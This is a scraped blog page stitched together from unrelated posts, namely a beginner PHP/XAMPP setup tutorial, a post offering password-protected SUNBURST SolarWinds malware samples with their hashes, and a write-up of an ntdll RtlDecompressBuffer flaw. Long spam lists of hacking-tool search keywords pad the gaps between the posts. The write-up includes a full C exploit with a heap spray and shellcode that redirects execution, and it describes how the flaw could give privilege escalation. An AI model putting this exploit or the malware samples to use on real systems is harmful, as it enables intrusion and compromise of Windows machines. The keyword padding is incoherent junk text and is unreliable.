How To Connect Database With PHP | Cool Interface Software | Tutorial 2

Welcome to my 2nd tutorial of PHP and MYSQL. In the previous video I've discussed How to download and install a server PHP and also How to create databases and How to create tables in the databases in the form of rows and columns.

In this video I've discussed multiple ways to connect database with PHP such as by using variables etc. First of all you have need to install a cool interface software for coding. I suggested you to download any one of them such as Dreamweaver, Notepad++, Sublime Text Editor and Atom etc. I'm using sublime text editor in this series of tutorial.

Syntax of PHP

<?php

//type here the code

?>

How to save the PHP file

You should save your PHP file in the root directory of the server. In XAMPP the "htdocs" is the root directory of the server. In WAMPP "www" is the root directory. Now how to save the file?

Step 1:

Press CTRL + S button to safe the file.

Step 2:

Go to the server location where it has been installed. By default it is installed in Local Disk C. Got C drive.

Step 3:

Go to XAMPP directory.

Step 4:

Go to htdocs diretory.

Step 5:

Save a file there with extension ".php". You can create a different folders for different projects in htdocs directory. So first create the folder in htdocs and then save your files in the folder.

How to Run PHP Script

Step 1:

Open a XAMPP control panel and start Apache and Mysql services.

Step 2:

Open your web browser.

Step 3:

Type localhost/yourFolderName/yourFileName.php and hit enter. For example: localhost/myFolder/index.php.

Continue reading

• Free Pentest Tools For Windows
• Game Hacking
• Hacking Tools Github
• Hacker Tools
• Pentest Tools Port Scanner
• Hacking App
• Hacking Tools
• Pentest Tools Online
• Hack Tools 2019
• Hack Tools For Pc
• Pentest Tools Android
• Hacker Tools 2020
• Best Hacking Tools 2019
• Hacking Tools For Mac
• Hack Tools For Games
• Hacking Tools Kit
• Hacking Tools For Windows 7
• What Is Hacking Tools
• Nsa Hack Tools Download
• What Are Hacking Tools
• Hacking Tools Hardware
• New Hacker Tools
• Pentest Tools Review
• Hack Apps
• Hacking Tools For Beginners
• Hacker Tools Free Download
• Hack App
• Hack Tools Mac
• Hacking Tools For Windows 7
• Hacking Tools Download
• Hack Tools For Ubuntu
• Pentest Tools Bluekeep
• Tools Used For Hacking
• Pentest Tools Windows
• Hacker Tools For Ios
• Hack Apps
• How To Make Hacking Tools
• Hacking Tools For Beginners
• Best Hacking Tools 2019
• Beginner Hacker Tools
• Hacker Tools For Windows
• Hackers Toolbox
• Hacker Tools For Windows
• Hack Tools Online
• Hacking Tools Github
• Hacking Tools
• Install Pentest Tools Ubuntu
• Hack Apps
• Hack Tools
• Nsa Hack Tools
• Hacker Security Tools
• Best Hacking Tools 2019
• Hacking Tools For Mac
• World No 1 Hacker Software
• Pentest Tools Online
• Hacker Tools Free Download
• Hack Tools For Windows
• Hacking Tools Usb
• Hack Tools For Ubuntu
• Hacker Tools Software
• Ethical Hacker Tools
• Hacker Tools Windows
• Hacker Tools For Pc
• Hacking Tools For Kali Linux
• Free Pentest Tools For Windows
• Pentest Tools Website Vulnerability
• Hacker Techniques Tools And Incident Handling
• Hacking Tools
• Hacking Tools Name
• Pentest Tools Tcp Port Scanner
• Pentest Tools Alternative
• Hacking Tools Free Download
• Hack Tool Apk No Root
• Tools Used For Hacking
• Tools For Hacker
• Hack And Tools
• Hack Tools For Windows
• Hacking Tools Github
• Hacker Tools Free
• Tools For Hacker
• Pentest Tools Alternative
• Hacking Tools For Kali Linux
• Hack Tools For Windows
• Pentest Tools Open Source
• Hacking Tools For Pc
• Hacker Techniques Tools And Incident Handling
• Pentest Tools Online
• Tools For Hacker
• Hack Tools
• Hack Website Online Tool
• Tools Used For Hacking
• What Is Hacking Tools
• Nsa Hack Tools
• Hackrf Tools
• Hack Tool Apk
• Growth Hacker Tools
• Pentest Tools Website
• Hacking Tools Name
• Hacks And Tools
• Pentest Tools Android
• Pentest Tools Github
• Pentest Tools Github
• Hacking Tools And Software
• Pentest Tools Find Subdomains
• Hacker Tools Apk
• Hacker Tools For Pc
• Pentest Tools Android
• Blackhat Hacker Tools
• Hacker Tools Apk
• Hack Tools Github
• Hacker Tool Kit
• How To Hack
• Hack Rom Tools
• Growth Hacker Tools
• Pentest Tools Framework
• Hacking Tools 2019
• Hackers Toolbox
• Nsa Hacker Tools
• Hacking Tools For Pc
• Hack Tools Mac
• Hacker Tools Free
• Hacker Tools 2019
• Hacking Tools For Windows
• Hacking Tools Online
• Hack Tools
• Hacking Tools Software
• Pentest Tools Open Source
• Top Pentest Tools
• Pentest Tools Open Source
• Tools Used For Hacking
• Nsa Hack Tools Download
• Beginner Hacker Tools
• Wifi Hacker Tools For Windows
• Pentest Tools Nmap
• Pentest Tools Find Subdomains
• Pentest Tools Apk
• Hack App
• Pentest Tools Open Source

>>>ဆက္ဖတ္ရန္>>> >>

2020-12-13 SUNBURST SolarWinds Backdoor Samples

2020-12-13 Fireeye 
Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor

The Resurgence of Russian Threat Actor, NOBELIUM

Download (627.7 MB). Email me if you need the password (see in my profile)
 

          Malware Inventory (work in progress)

Reference

I am sure you all saw the news. 

Links updated: Jan 19, 2023

2020-12-13 Microsoft

Customer Guidance on Recent Nation-State Cyber Attacks

The Resurgence of Russian Threat Actor, NOBELIUM

 

Well, here are the Sunburst binaries. 

Here is a Sunburst malware analysis walk-through video by Colin Hardy

https://www.youtube.com/watch?v=JoMwrkijTZ8&feature=youtu.be

Hashes

SolarWinds.Orion.Core.BusinessLayer.dll

 Trojan:MSIL/Solorigate.B!dha

A Variant Of MSIL/SunBurst.A

SolarWinds.Orion.Core.BusinessLayer.dll

32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77

dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b

eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed

c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77

ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c

019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134

ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6

a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc

d3c6785e18fba3749fb785bc313cf8346182f532c59172b69adfb31b96a5d0af

0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589

6e4050c6a2d2e5e49606d96dd2922da480f2e0c70082cc7e54449a7dc0d20f8d

CORE-2019.4.5220.20574-SolarWinds-Core-v2019.4.5220-Hotfix5.msp

d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600

appweblogoimagehandler.ashx.b6031896.dll

c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71

TEARDROP

b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07

1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c

RAINDROP

be9dbbec6937dfe0a652c0603d4972ba354e83c06b8397d6555fd1847da36725

This is the compromised installer file ( was still on Solarwinds update downloads  on Dec 14, 2020)

File size 419.76 MB

CoreInstaller.msi

ad2fbf4add71f61173975989d1a18395afb8538ed889012b9d2e21c19e98bbd1

2020-04-21 17:31:02

SolarWinds Orion Core Services 2020.2

{77E2D294-3D5C-4D93-ADF1-884CCEAD93B0}

File Version Information

Date signed 05:32 PM 04/21/2020

Signers

Solarwinds Worldwide, LLC

Symantec Class 3 SHA256 Code Signing CA

VeriSign

VT - 0 (Dec 14, 2020)

If you unzip, check 

019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134   (36 detections , part of the IOC set)

SolarWinds.Orion.Core.BusinessLayer.dll under OrionCore

Related links

1. Hack Tools Online
2. Tools For Hacker
3. Best Hacking Tools 2019
4. Hacking Tools
5. Pentest Tools Apk
6. Underground Hacker Sites
7. How To Make Hacking Tools
8. What Are Hacking Tools
9. Beginner Hacker Tools
10. Hacking Tools Github
11. Hack And Tools
12. What Are Hacking Tools
13. Pentest Tools Framework
14. Top Pentest Tools
15. World No 1 Hacker Software
16. Hacker Techniques Tools And Incident Handling
17. Hacking Tools Name
18. Hack And Tools
19. Hack Tools 2019
20. Pentest Tools Linux
21. Hack Tools
22. Free Pentest Tools For Windows
23. Hacks And Tools
24. Hacking App
25. Hacking Tools For Windows
26. Hacking Tools Hardware
27. Wifi Hacker Tools For Windows
28. Pentest Tools Github
29. Black Hat Hacker Tools
30. Best Hacking Tools 2019
31. Free Pentest Tools For Windows
32. Pentest Tools Port Scanner
33. Hack Tools For Mac
34. Pentest Tools Find Subdomains
35. Pentest Tools Linux
36. Pentest Tools Free
37. Hacker Tools Github
38. Hacker Tools 2019
39. Game Hacking
40. Pentest Tools Website Vulnerability
41. Hack Tools Mac
42. Hacker Tools Software
43. Bluetooth Hacking Tools Kali
44. Hack Tool Apk
45. Pentest Tools Port Scanner
46. Best Pentesting Tools 2018
47. Hacking Tools Windows 10
48. Hack Tools For Games
49. Pentest Tools Subdomain
50. Hacking Tools For Pc
51. Wifi Hacker Tools For Windows
52. Hack Tools Online
53. Hack Rom Tools
54. Hack Tools For Mac
55. Hacking Tools Mac
56. Hack And Tools
57. What Are Hacking Tools
58. Pentest Tools Port Scanner
59. Hack Tools Pc
60. Hack Website Online Tool
61. Wifi Hacker Tools For Windows
62. Hacker Tools Linux
63. Nsa Hack Tools Download
64. Hacker
65. Hack Tools For Windows
66. Physical Pentest Tools
67. Pentest Tools Windows
68. Blackhat Hacker Tools
69. Hacks And Tools
70. Pentest Tools Online
71. Hack Tools For Mac
72. Hacker Security Tools
73. Pentest Tools Find Subdomains
74. Nsa Hacker Tools
75. Github Hacking Tools
76. Hacker Tools Windows
77. Termux Hacking Tools 2019
78. Pentest Tools Online
79. Hacker Tools List
80. Pentest Tools Android
81. Hacker Tools Free
82. Hacking Tools
83. Top Pentest Tools
84. Hacker Tools Windows
85. Top Pentest Tools
86. Hack Tools For Mac
87. Hack Tools Online
88. What Is Hacking Tools
89. Hack And Tools
90. Hacking Tools For Mac
91. Blackhat Hacker Tools
92. Ethical Hacker Tools
93. Hacking Tools For Windows
94. Hack Tools For Windows
95. Pentest Tools Tcp Port Scanner
96. Hacker Tools For Ios
97. Pentest Tools Alternative
98. Hack Tools For Mac
99. Tools Used For Hacking
100. Pentest Automation Tools
101. Hacker Hardware Tools
102. Pentest Tools Github
103. Hacking Tools Github
104. Hacking Tools For Windows
105. Pentest Tools Open Source

>>>ဆက္ဖတ္ရန္>>> >>

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6) {   int result; // eax@4    if ( algorithm & algorithm != 1 )   {     if ( algorithm & 0xF0 )       result = -1073741217;     else       result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);   }   else   {     result = -1073741811;   }   return result; }

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

• the movzx limits the boundaries to 16bits
• the test ax, ax avoids the algorithm 0
• the cmp ax, 1 avoids the algorithm 1
• the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*     ntdll!RtlDecompressBuffer() vtable exploit + heap spray     by @sha0coder  */  #include  #include  #include   #define KB  1024 #define MB  1024*KB #define BLK_SZ 4096 #define ALLOC 200 #define MAGIC_DECOMPRESSION_AGORITHM 9  // WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php /* unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" "\xBF\x77\xFF\xD2\xCC" "\xE8\xF3\xFF\xFF\xFF" "\x63\x61\x6C\x63"; */  // https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html char *shellcode =        "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"        "\x45\x81\x3e\x43\x72\x65\x61\x75"        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"        "\x6c\x63\x89\xe2\x52\x52\x53\x53"        "\x53\x53\x53\x53\x52\x53\xff\xd7";   PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits  void fail(const char *msg) {   printf("%s\n\n", msg);   exit(1); }  PUCHAR spray(HANDLE heap) {   PUCHAR map = 0;    printf("Spraying ...\n");   printf("Aproximating to %p\n", landing_ptr);    while (map < landing_ptr-1*MB) {     map = HeapAlloc(heap, 0, 1*MB);   }    //map = HeapAlloc(heap, 0, 1*MB);    printf("Aproximated to [%x - %x]\n", map, map+1*MB);     printf("Landing adddr: %x\n", landing_ptr);   printf("Offset of landing adddr: %d\n", landing_ptr-map);    return map; }  void landing_sigtrap(int num_of_traps) {   memset(landing_ptr, 0xcc, num_of_traps); }  void copy_shellcode(void) {   memcpy(landing_ptr, shellcode, strlen(shellcode));  }  int main(int argc, char **argv) {   FARPROC RtlDecompressBuffer;   NTSTATUS ntStat;   HANDLE heap;   PUCHAR compressed, uncompressed;   ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;    RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");    heap = GetProcessHeap();    compressed_sz = estimated_uncompressed_sz = 1*KB;    compressed = HeapAlloc(heap, 0, compressed_sz);    uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);     spray(heap);   copy_shellcode();   //landing_sigtrap(1*KB);   printf("Landing ...\n");    ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);    switch(ntStat) {     case STATUS_SUCCESS:       printf("decompression Ok!\n");       break;      case STATUS_INVALID_PARAMETER:       printf("bad compression parameter\n");       break;       case STATUS_UNSUPPORTED_COMPRESSION:       printf("unsuported compression\n");       break;      case STATUS_BAD_COMPRESSION_BUFFER:       printf("Need more uncompressed buffer\n");       break;      default:       printf("weird decompression state\n");       break;   }    printf("end.\n"); } 

The attack vector

 
 This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
 
 
 

Read more

1. Hack Tools Mac
2. Pentest Tools For Android
3. Nsa Hacker Tools
4. Hacker Tools For Mac
5. Kik Hack Tools
6. Pentest Tools Framework
7. Nsa Hack Tools
8. Pentest Tools Framework
9. Pentest Recon Tools
10. Hack Tools
11. Pentest Tools Free
12. Beginner Hacker Tools
13. Hack App
14. Hacker Tools List
15. Pentest Tools For Ubuntu
16. Hacker Tools Apk Download
17. Hacking Tools For Pc
18. Black Hat Hacker Tools
19. Pentest Tools Linux
20. Growth Hacker Tools
21. Hack Website Online Tool
22. Pentest Tools
23. Pentest Tools Android
24. Pentest Tools Port Scanner
25. Hacking Tools For Windows
26. Hacking Tools Name
27. Usb Pentest Tools
28. Best Hacking Tools 2019
29. Hacking Tools Free Download
30. Hacking Tools 2019
31. Usb Pentest Tools
32. Pentest Tools Download
33. Hacking Tools Mac
34. Hacking Tools For Mac
35. Hacker Tools
36. Hackrf Tools
37. Hacker Tools Mac
38. Pentest Tools Port Scanner
39. Pentest Tools Subdomain
40. Hacking Tools For Games
41. Hak5 Tools
42. How To Make Hacking Tools
43. How To Install Pentest Tools In Ubuntu
44. Hack Rom Tools
45. Hacker Tools Github
46. Hacking Tools And Software
47. Bluetooth Hacking Tools Kali
48. Hacker Security Tools
49. Hacking Tools Free Download
50. Hack And Tools
51. Hacking Tools Mac
52. Pentest Tools Windows
53. Hack Tools For Mac
54. Growth Hacker Tools
55. World No 1 Hacker Software
56. Hacker Tools For Ios
57. Hacking Tools Mac
58. Nsa Hack Tools
59. Pentest Tools Android
60. Hacker Tools 2019
61. Pentest Tools For Android
62. Hackrf Tools
63. Hack Tools For Ubuntu
64. Wifi Hacker Tools For Windows
65. Tools For Hacker
66. Hacking Tools For Windows Free Download
67. Pentest Tools Website Vulnerability
68. Pentest Tools Tcp Port Scanner
69. Github Hacking Tools
70. Hack Tools
71. Hak5 Tools
72. Easy Hack Tools
73. Hacker Tools 2020
74. Tools For Hacker
75. Pentest Box Tools Download
76. Wifi Hacker Tools For Windows
77. Pentest Tools List
78. How To Make Hacking Tools
79. Hacking Tools For Windows 7
80. Top Pentest Tools
81. Black Hat Hacker Tools
82. Wifi Hacker Tools For Windows
83. Hacking Tools Kit
84. Pentest Tools Github
85. Pentest Tools Review
86. Hack Tools For Mac
87. Growth Hacker Tools
88. Github Hacking Tools
89. Hacker Tools For Windows
90. Pentest Tools Github
91. New Hacker Tools
92. Pentest Tools Bluekeep
93. Hack Rom Tools
94. Hack And Tools
95. New Hack Tools
96. Hacking Tools Mac
97. Nsa Hack Tools
98. Physical Pentest Tools
99. Hacking Tools Download
100. Underground Hacker Sites
101. Pentest Tools Kali Linux
102. Usb Pentest Tools
103. Hacker Tools For Pc
104. Hacker Tools Windows
105. Pentest Tools Port Scanner

>>>ဆက္ဖတ္ရန္>>> >>